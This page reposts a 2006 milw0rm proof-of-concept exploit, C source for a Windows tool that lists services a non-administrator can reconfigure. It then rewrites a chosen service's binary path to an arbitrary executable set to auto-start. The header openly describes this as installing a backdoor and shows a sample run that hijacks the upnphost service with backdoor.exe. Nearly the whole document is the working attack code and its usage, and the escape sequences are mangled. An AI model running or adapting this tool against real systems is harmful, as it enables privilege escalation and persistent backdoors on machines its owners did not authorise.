MS Windows Services access list checker/modifier POC

Source: Internet
Author: User
/* * Privilege Checker for windows Services * (c) 2006 Andres Tarasco ( atarasco _at_ gmail.com ) * http://www.haxorcitos.com * * Based on Sudhakar Govindavajhala and Andrew Appel paper * http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf * * usage: * You should execute this tool without Admin privileges on the target system * using for example an user account * * srvcheck.exe -l              - show vulnerable services * srvcheck.exe -m Service PATH - modify service configuration (install backdoor) * * Example for windows XP SP2 computer D:/>whoami HXR/test D:/>net user test |find "grupo" Miembros del grupo local                    *Usuarios Miembros del grupo global                   *Ninguno D:/>srvchecker.exe -l Services Permissions checker [SSDPSRV]               Servicio de descubrimientos SSDP Status: 0x1 Path: C:/WINDOWS/System32/svchost.exe -k LocalService [upnphost]              Host de dispositivo Plug and Play universal Status: 0x1 Path: C:/WINDOWS/System32/svchost.exe -k LocalService You were Lucky. 2 services found D:/>srvchecker -m upnphost c:/windows/temp/backdoor.exe Services Permissions checker (c) 2006 Andres Tarasco - atarasco _at_ gmail.com service modified =) D:/>net start upnphost * * NOTE: This code compiles under Borland C++ Builder **/#include <stdio.h>#include <windows.h>void doFormatMessage( unsigned int dwLastErr );int main(int argc, char* argv[]){SC_HANDLE SCM;LPENUM_SERVICE_STATUS_PROCESS lpServices;unsigned int n;DWORD nSize = 0;DWORD nServicesReturned;DWORD nResumeHandle;DWORD dwServiceType;SC_HANDLE Svc;LPQUERY_SERVICE_CONFIG lpConfig;DWORD dwByteNeeded;char SrvName[256],SrvDesc[256];BYTE LIST=0;unsigned int l=0;printf(" Services Permissions checker/n");printf(" (c) 2006 Andres Tarasco - atarasco _at_ gmail.com/n/n"); if ( ( (argc==1) || (argc>5) ) ||    ( (argc==2) && (strcmp(argv[1],"-l")!=0) ) ||    ( (argc==4) && (strcmp(argv[1],"-m")!=0) )   ) {    printf("Usage:/n/t-l (list vulnerable services)/n");    printf("/t-m SRVNAME NewPath (change the configuration for that service)/n");    exit(1); } if (argv[1][1]=='l') {    LIST=1;    SCM = OpenSCManager(NULL,NULL,SC_MANAGER_ENUMERATE_SERVICE); }else {    SCM = OpenSCManager(NULL,NULL,STANDARD_RIGHTS_WRITE); } if (!SCM){    printf("OpenScManager FAILED/n");    doFormatMessage(GetLastError());    exit(-1); } if (LIST) {    nResumeHandle = 0;    dwServiceType = SERVICE_WIN32 | SERVICE_DRIVER;    lpServices = (LPENUM_SERVICE_STATUS_PROCESS) LocalAlloc(LPTR, 65535);    if (!lpServices) {        printf("LocalAlloc Failed/n");        exit(-1);    }    memset(lpServices,'/0',sizeof(lpServices));    if (EnumServicesStatusEx(SCM, SC_ENUM_PROCESS_INFO,        dwServiceType, SERVICE_STATE_ALL,        (LPBYTE)lpServices, 65535,        &nSize, &nServicesReturned,        &nResumeHandle, NULL) == 0) {        printf("EnumServicesStatusEx FAILED/n");        exit(-1);    }    for (n = 0; n < nServicesReturned; n++) {        Svc = OpenService(SCM,lpServices[n].lpServiceName, SERVICE_CHANGE_CONFIG | SC_MANAGER_ENUMERATE_SERVICE |GENERIC_READ);        if (Svc!=NULL) {            l++;            printf("[%s]/t/t%s/n",lpServices[n].lpServiceName, lpServices[n].lpDisplayName);            printf("Status: 0x%x/n",lpServices[n].ServiceStatusProcess.dwCurrentState);    dwByteNeeded = 0;    lpConfig = (LPQUERY_SERVICE_CONFIG) LocalAlloc(LPTR, 1024);    if (QueryServiceConfig(Svc, lpConfig, 1024, &dwByteNeeded)!=0) {                printf("Path: %s/n/n",lpConfig->lpBinaryPathName);            }else {                doFormatMessage(GetLastError());            }        }    } } else {    Svc = OpenService(SCM,argv[2],SERVICE_CHANGE_CONFIG | STANDARD_RIGHTS_WRITE);    if (Svc!=NULL) {         if (ChangeServiceConfig(                Svc,                SERVICE_NO_CHANGE,                SERVICE_AUTO_START,                SERVICE_ERROR_IGNORE,                argv[3],                NULL,                NULL,                "",                NULL,                NULL,                NULL)!=0) {                printf("service modified =)/n");         } else {            printf("modification failed/n");         }    } else {        printf("Unable to open Service %s/n",argv[2]);    } } if ( (LIST) && (l>0) ) {    printf("/n You were Lucky. %i services found/n",l); } else {    printf("/No luck/n"); } CloseServiceHandle(SCM); LocalFree(lpServices); return(1);}void doFormatMessage( unsigned int dwLastErr )  {    char cadena[512];    LPVOID lpMsgBuf;    FormatMessage(        FORMAT_MESSAGE_ALLOCATE_BUFFER |        FORMAT_MESSAGE_IGNORE_INSERTS |        FORMAT_MESSAGE_FROM_SYSTEM,        NULL,        dwLastErr,        MAKELANGID( LANG_NEUTRAL, SUBLANG_DEFAULT ),        (LPTSTR) &lpMsgBuf,        0,        NULL );    sprintf(cadena,"ERRORCODE %i: %s/n", dwLastErr, lpMsgBuf);    printf("Error: %s/n",cadena);    LocalFree( lpMsgBuf  );}// milw0rm.com [2006-02-02]
Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.